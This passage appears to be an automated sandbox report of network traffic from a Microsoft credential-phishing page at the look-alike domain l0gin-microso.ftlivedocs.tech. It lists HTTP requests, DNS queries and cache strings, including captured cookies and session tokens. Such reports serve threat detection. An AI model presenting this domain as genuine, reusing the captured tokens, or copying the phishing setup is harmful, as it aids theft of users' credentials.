98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; x-ms-gateway-slice=estsfd; fpc=AiTvsUNzDMhLtivCMH0SOIk; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe6JSh8XySIX2JZIyDEcAnTGHJW7xDRybzTrnJSMuljy1faq4uekBlYW6Qep
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_JQnUxWSvwsd9FrpspQmznw2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: ywnjb.ftlivedocs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; MUID=0572C4040C3160E33E86D10A0D3661F9
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_qzvqnltrxpy99ajspyxbgq2.css HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://l0gin-microso.ftlivedocs.techsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_ELtAAt2Ya8ISGuc0PJcBKA2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://l0gin-microso.ftlivedocs.techsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://l0gin-microso.ftlivedocs.techsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_ELtAAt2Ya8ISGuc0PJcBKA2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: ywnjb.ftlivedocs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; MUID=0572C4040C3160E33E86D10A0D3661F9; uaid=12fc96651938487da1bcb76e2727bac5; MSPRequ=id=N&lt=1728047473&co=1
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6Xtt1sBzydtZp6M&MD=91XKTh55 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
            Source: global trafficHTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -240X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAbIzB0A4h2D%2BNkHrVkQylh58%2BvwMN/s6obbwPIDvP8RId7%2B52mg6j96NqltBLmSJDZq7dpan/Biy4iI94XRRBsKCwcQnYCkLPOqnjz8HPQwbOUE8Z1jVHWhD5RDayAmqSOaVYKZaqyvHF0Sbv7B6HLy1wh1STiGG8DdEISAuVtusyELKMwv7OLxWUZnZHDsm5ow0olTWYecTmkPOEw9B6plzponbdE%2BWd5JOar5hhsREUVwj6rVk2E2CX6pjwCdqrcUea1pn1cWWQNIc/IR/AZjod6v1bK9MiQXyhpG3or9vWDY62DKBleAo7GizRpXE%2BiCiOffEzOnWGviCSWajBi0QZgAAEM5S7DwxrwApMATd2WxVp%2BOwAZe1pwhoFYCyynam8KnopJ9vBSxTxxklQ1FROTdoEkZKx6JFCTcja4kqEh6US0eitvQbSqciLfwThHUrPrU/lBONghJO0/Os7D4evM374mWxI2PBgVfFuNR/Sm3CEB0Z4m/A%2B1UROyD6JVrVwbg8l1sFgfqSzvoElbGJyDztj9F/ntgpEX5klsqOFmA46%2BGcN%2BR242lQeArgSmStNBHstuGpa3JVd%2BFDN7XviS3AbKyPh/2E7G1m9VvFb5F76R1HUgzEvUyjUfFYL2CqJ32x2v0d3BGK4NNqLVo/tI%2BAaeAe1uLdM0Gcv2%2Bitf5%2BXvpvxojy9x7tTbQWWbomh5%2BgbwkmCye3SpUDCk2olN95yNqlaRBxFR4PxrYUGYITBj8%2BdQPhLChw9I2AIvPuEhO8eR8tqnk9/ROZe%2Bu9Iuxwr665N0M%2B/W6S37jrp%2Bgr0E1kU/dKfZL6dXH8oVdI/m4CXJS%2Bnw/kLEZhrVeU/lULXiX0hZQCYIEIsQ0Phgt/mQSb6yFidBHH1eLCfLOZAqAaH18vzs9mUepvhTOiCZ0s9REPadu7heYRnpsrfxiaFFEHRtcB%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1728047494User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 2578F7F661CB4F88B6597755BC50BB4AX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
            Source: global trafficDNS traffic detected: DNS query: nomicscare.com
            Source: global trafficDNS traffic detected: DNS query: crewbloom.s3.amazonaws.com
            Source: global trafficDNS traffic detected: DNS query: pbs.twimg.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: l0gin-microso.ftlivedocs.tech
            Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.ftlivedocs.tech
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
            Source: global trafficDNS traffic detected: DNS query: ywnjb.ftlivedocs.tech
            Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
            Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenx-amz-request-id: M4RGGHMMMNGH1FQ7x-amz-id-2: J5FNCwYXYTAg7fPoukB+g+Tfvb9a72793pOw24cgCZ69wzj/Y5z6lbGwnDL5Rz2FwX/nHDyi7TPkKohyiW2t3Q==Content-Type: application/xmlTransfer-Encoding: chunkedDate: Fri, 04 Oct 2024 13:10:51 GMTServer: AmazonS3Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:04 GMTTransfer-Encoding: chunkedConnection: closeCache-Control: privateNel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"Referrer-Policy: strict-origin-when-cross-originReport-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+bno"}]}X-Ms-Ests-Server: 2.1.19005.9 - NCUS ProdSlicesX-Ms-Request-Id: f263b88c-7eca-4adc-9de0-66f6a6630600X-Ms-Srs: 1.PCF-Cache-Status: BYPASSSet-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8cd56a6d09578c2f-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:05 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: PWLXgaJDLE27pSu3T4xa7t6dW6j7j0GRqiE=$Daohbmu9MW1icFpacache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8cd56a739e050f3d-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:08 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: OJsGAxN8qj6DrvDaz5peZlZzqVoYom3qgeY=$pQsbHOjbUeTv7CMIServer: cloudflareCF-RAY: 8cd56a87cc940f9c-EWR
            Source: chromecache_1178.12.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
            Source: chromecache_1178.12.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
            Source: chromecache_1172.12.drString found in binary or memory: https://l0gin-microso.ftlivedocs.tech
